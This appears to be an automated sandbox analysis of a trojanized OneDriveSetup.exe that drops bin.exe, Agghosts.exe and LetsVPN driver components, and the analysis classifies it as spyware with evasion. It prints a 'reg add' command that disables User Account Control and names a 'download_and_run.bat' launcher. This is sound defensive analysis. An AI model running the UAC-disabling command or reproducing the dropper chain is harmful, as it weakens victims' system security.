                Source: unknownHTTPS traffic detected: 43.132.105.214:443 -> 192.168.2.4:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 4.152.45.219:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 4.152.45.219:443 -> 192.168.2.4:49746 version: TLS 1.2
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00405705
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6CF46C4E __EH_prolog3,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,9_2_6CF46C4E
                Source: bin.exe, 00000017.00000003.1653704947.0000000002822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: is unavailable()<>@,;:\"/[]?=,M3.2.0,M11.1.0-------------- 0601021504Z0700114.114.114.114126.255.255.254169.254.255.255191.255.255.254223.255.255.254255.255.255.248476837158203125: cannot parse : no frame (sp=; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAccount-ExpiredAccount-TimeoutAddDllDirectoryAddMandatoryAceAreFileApisANSIBP_BUFFERFORMATBackupEventLogWCLSIDFromProgIDCLSIDFromStringCOLORADJUSTMENTCOMPOSITIONFORMCRYPTOAPI_BLOB_CRYPT_ATTRIBUTECRYPT_ATTR_BLOBCRYPT_DATA_BLOBCRYPT_HASH_BLOBCallWindowProcWClientAuthType(CoInitializeWOWColorAdjustLumaCompareFileTimeControl_RunDLLWCreateDataCacheCreateErrorInfoCreateHardLinkWCreateMailslotWCreateMetaFileWCreatePopupMenuCreateToolbarExCreateWindowExWCryptCreateHashCryptDestroyKeyCryptGetUserKeyCryptMemReallocCryptMsgControlDAD_DragEnterExDESKTOPENUMPROCDdeGetLastErrorDdeQueryStringWDdeUnaccessDataDdeUninitializeDefRawInputProcDefSubclassProcDeleteIPAddressDestinationAddrDeviceIoControlDialogBoxParamWDlgDirSelectExWDnsPolicyConfigDownload-FailedDragAcceptFilesDrawMenuBarTempDrawStatusTextWDrawThemeTextExDuplicateHandleECDSAP256SHA256ECDSAP384SHA384ENG_TIME_FIELDSENUMLOGFONTEXDVENUMRESLANGPROCEXPLICIT_ACCESSEmptyWorkingSetEnableScrollBarEngCreateBitmapEngEraseSurfaceEngFindResourceEngGradientFillEnumEnhMetaFileExcludeClipRectExtCreateRegionFailed to find Failed to load FindExecutableWFindNextStreamWFindNextVolumeWFindResourceExWFindVolumeCloseFlush dns cacheFlushIpNetTableFlushViewOfFileFreeAddrInfoExWGENERIC_MAPPINGGateway TimeoutGdiGradientFillGdiIsMetaFileDCGetActiveObjectGetActiveWindowGetAdapterIndexGetAdaptersInfoGetArcDirectionGetCharWidth32WGetClassInfoExWGetComboBoxInfoGetCommTimeoutsGetCommandLineWGetDCBrushColorGetDateFormatExGetDlgItemTextWGetEnhMetaFileWGetGraphicsModeGetGuiResourcesGetIpStatisticsGetKeyNameTextWGetKeyboardTypeGetLocaleInfoExGetMailslotInfoGetMenuItemRectGetMonitorInfoWGetNearestColorGetPolyFillModeGetProcessHeapsGetProcessTimesGetRawInputDataGetSecurityInfoGetStartupInfoWGetTapePositionGetTextMetricsWGetThemeIntListGetThemeMarginsGetThemeSysBoolGetThemeSysFontGetThemeSysSizeGetThreadLocaleGetTimeFormatExGetTitleBarInfoGetTrusteeFormWGetTrusteeNameWGetTrusteeTypeWGetWindowRgnBoxGlobalFindAtomWHanifi_RohingyaHasIPPacketInfoHost-Block-ListHost-Local-ListICreateTypeLib2IMEMENUITEMINFOIO_STATUS_BLOCKIP-Country-ListIP-Queue-LengthIP_ADAPTER_INFOIPersistStorageIShellItemArrayI_CryptAllocTlsI_RpcFreeBufferIcmp6CreateFileIcmpCloseHandleIcmpSendEcho2ExIdempotency-KeyImageList_MergeImageList_WriteImmIsUIMessageWImpersonateSelfInSendMessageExInitMUILanguageInsertMenuItemWIsBadStringPtrWIsHungAppWindowIsValidCodePageIsWindowEnabledIsWindowUnicodeIsWindowVisibleIsWow64Process2K32GetWsChangesKillSystemTimerLPCONDITIONPROCLPENUMFORMATETCLPFNDFMCALLBACKLPLOGCOLORSPACELPMESSAGEFILTERLPOLECLIENTSITELPPAGEPAINTHOOKLPPAGESETUPHOOKLPPRINTHOOKPROCLPSETUPHOOKPROCLPSHQUERYRBINFOLPWSAOVERLAPPEDLWBTBVCITWI2025Length RequiredLoadLibraryExAmemstr_02907ed1-6
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6CEF7970 GetKeyState,GetKeyState,GetKeyState,9_2_6CEF7970
                Source: Yara matchFile source: 59.2.LetsPRO.exe.68b70000.21.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000003.1653704947.0000000002822000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: bin.exe PID: 736, type: MEMORYSTR
                Source: Yara matchFile source: C:\Program Files (x86)\letsvpn\app-3.12.2\libwin.dll, type: DROPPED
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\SETE857.tmpJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.catJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\SETEB16.tmpJump to dropped file
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\tap0901.cat (copy)Jump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\tap0901.cat (copy)Jump to dropped file

                System Summary

                barindex
                Powershell drops PE file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Videos\bin.exeJump to dropped file
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_007D77F0: DeviceIoControl,9_2_007D77F0
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,23_2_0040351C
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.sysJump to behavior
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_662fd96dfdced4ae
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\drvstore.tmp
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\inf\oem4.inf
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETF101.tmp
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETF101.tmp
                Source: C:\Windows\System32\drvinst.exeFile deleted: C:\Windows\System32\drivers\SETF101.tmp
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006FF2209_2_006FF220
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066372E9_2_0066372E
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066168B9_2_0066168B
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666B779_2_00666B77
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00663A629_2_00663A62
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666B779_2_00666B77
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066770C9_2_0066770C
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666B409_2_00666B40
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666B409_2_00666B40
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006678EC9_2_006678EC
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00662D519_2_00662D51
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006679239_2_00667923
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006628E29_2_006628E2
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00663ADF9_2_00663ADF
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006672C59_2_006672C5
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066133E9_2_0066133E
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006617A39_2_006617A3
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006672C59_2_006672C5
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066133E9_2_0066133E
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006672C59_2_006672C5
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006617A39_2_006617A3
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006672C59_2_006672C5
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006669979_2_00666997
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006642FF9_2_006642FF
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066326F9_2_0066326F
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006613BB9_2_006613BB
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066326F9_2_0066326F
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066201D9_2_0066201D
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066201D9_2_0066201D
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066312F9_2_0066312F
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066326F9_2_0066326F
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066201D9_2_0066201D
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066201D9_2_0066201D
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066312F9_2_0066312F
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066312F9_2_0066312F
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066312F9_2_0066312F
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00662D339_2_00662D33
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00667CB19_2_00667CB1
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00662D339_2_00662D33
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00662D339_2_00662D33
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00662D339_2_00662D33
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006667999_2_00666799
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00661A8C9_2_00661A8C
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_1001133F9_2_1001133F
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_100118909_2_10011890
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_10011F6C9_2_10011F6C
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_10010DEE9_2_10010DEE
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_1000B77E9_2_1000B77E
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_100024A09_2_100024A0
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_10012EA19_2_10012EA1
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6CEF3C359_2_6CEF3C35
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6D0EE1ED9_2_6D0EE1ED
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6CF4BCBC9_2_6CF4BCBC
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6D123D5C9_2_6D123D5C
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6CF8FB379_2_6CF8FB37
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_00406C5F23_2_00406C5F
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 24_2_1001189024_2_10011890
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 24_2_100024A024_2_100024A0
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 24_2_10010DEE24_2_10010DEE
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 24_2_10012EA124_2_10012EA1
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 24_2_1001133F24_2_1001133F
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 24_2_10011F6C24_2_10011F6C
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 24_2_1000B77E24_2_1000B77E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_04BFB4B825_2_04BFB4B8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_04BFB4A825_2_04BFB4A8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08CA3AA825_2_08CA3AA8
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess token adjusted: Load Driver
                Source: C:\Windows\System32\svchost.exeProcess token adjusted: Security
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: String function: 10009E60 appears 58 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: String function: 6D0C9598 appears 133 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: String function: 00668422 appears 31 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: String function: 00662CA2 appears 35 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: String function: 00667509 appears 35 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: String function: 0066DB57 appears 42 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: String function: 00667FD6 appears 93 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: String function: 0066E4A8 appears 53 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: String function: 6D0C95CB appears 45 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: String function: 6D0C9670 appears 33 times
                Source: OneDriveSetup.exeStatic PE information: Resource name: PAYLOAD type: Microsoft Cabinet archive data, many, 78359548 bytes, 1024 files, at 0x44 +A "adal.dll" +A "alertIcon.png", flags 0x4, number 1, extra bytes 20 in head, 9812 datablocks, 0x1503 compression
                Source: System.Globalization.Extensions.dll.23.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: OneDriveSetup.exeBinary or memory string: OriginalFilename vs OneDriveSetup.exe
                Source: OneDriveSetup.exe, 00000000.00000003.1303148868.000001F79493A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs OneDriveSetup.exe
                Source: OneDriveSetup.exe, 00000000.00000003.1285315080.000001F7954EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibcefur.dll: vs OneDriveSetup.exe
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZAM.exeD vs OneDriveSetup.exe
                Source: OneDriveSetup.exe, 00000000.00000002.1308257134.000001F79493A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs OneDriveSetup.exe
                Source: OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZAM.exeD vs OneDriveSetup.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                Source: System.IO.Pipes.AccessControl.dll.23.dr, PipesAclExtensions.csSecurity API names: System.IO.Pipes.PipeStream.SetAccessControl(System.IO.Pipes.PipeSecurity)
                Source: System.IO.Pipes.AccessControl.dll.23.dr, PipesAclExtensions.csSecurity API names: System.IO.Pipes.PipeStream.GetAccessControl()
                Source: System.IO.FileSystem.AccessControl.dll.23.dr, FileSystemAclExtensions.csSecurity API names: directoryInfo.GetAccessControl
                Source: System.IO.FileSystem.AccessControl.dll.23.dr, FileSystemAclExtensions.csSecurity API names: fileInfo.SetAccessControl
                Source: System.IO.FileSystem.AccessControl.dll.23.dr, FileSystemAclExtensions.csSecurity API names: fileStream.GetAccessControl
                Source: System.IO.FileSystem.AccessControl.dll.23.dr, FileSystemAclExtensions.csSecurity API names: fileInfo.GetAccessControl
                Source: System.IO.FileSystem.AccessControl.dll.23.dr, FileSystemAclExtensions.csSecurity API names: directoryInfo.SetAccessControl
                Source: System.IO.FileSystem.AccessControl.dll.23.dr, FileSystemAclExtensions.csSecurity API names: fileStream.SetAccessControl
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ".xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;" +
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c.xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec
                Source: classification engineClassification label: mal82.spre.spyw.evad.winEXE@101/292@11/14
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00664601 FormatMessageA,GetLastError,9_2_00664601
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,23_2_0040351C
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_004049B1 GetDlgItem,SetWindowTextW,SHAutoComplete,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,23_2_004049B1
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6CF0ED33 CoInitialize,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,9_2_6CF0ED33
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0071D260 GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,9_2_0071D260
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpnJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile created: C:\Users\Public\Music\20250413054815\Jump to behavior
                Source: C:\Windows\System32\drvinst.exeMutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:772:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4008:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4284:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:528:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6456:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2964:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMutant created: \Sessions\1\BaseNamedObjects\C__Program Files (x86)_letsvpn_app-3.12.2_Log_
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2768:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4536:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mypg3syr.jg0.ps1Jump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "
                Source: OneDriveSetup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: OneDriveSetup.exe, 00000000.00000000.1201142433.00007FF6B5263000.00000008.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309856968.00007FF6B5264000.00000008.00000001.01000000.00000003.sdmp, bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
